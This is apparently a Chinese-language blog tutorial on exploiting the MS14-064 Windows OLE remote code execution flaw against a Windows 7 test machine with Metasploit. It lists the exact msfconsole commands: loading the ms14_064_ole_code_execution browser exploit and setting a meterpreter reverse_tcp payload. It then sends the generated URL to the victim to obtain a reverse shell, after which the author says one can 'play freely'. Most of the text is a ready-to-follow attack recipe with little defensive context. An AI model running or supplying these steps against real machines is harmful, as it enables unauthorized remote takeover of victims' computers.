MS14-064 漏洞测试入侵win7

Microsoft Windows OLE远程代码执行漏洞，OLE（对象链接与嵌入）是一种允许应用程序共享数据和功能的技术，

远程攻击者利用此漏洞通过构造的网站执行任意代码，影响Win95+IE3 – Win10+IE11全版本...

metasploit里已经加入了此漏洞的利用模块 ：exploit/windows/browser/ms14_064_ole_code_execution

执行命令：

msfconsole    //启动MSF

search ms14   //搜索关键字

use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块

set payload windows/meterpreter/reverse_tcp    //设置反弹连接shell

如图：

需要注意的是箭头标记的属性默认为false 需要设置为true ，因为msf中自带的漏洞利用exp调用的是 powershell，

所以msf（Metasploit Framework）中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell，

所以我们这里测试受害的机器为windows7 32位.

按照图中各个属性配置好后 执行exploit即可

得到一个URL地址，复制到受害者机器(win7)测试

当用户点击允许了后

可以看见这边反弹了一个shell,接下里我们就可以随便玩了， 

 测试成功，结束。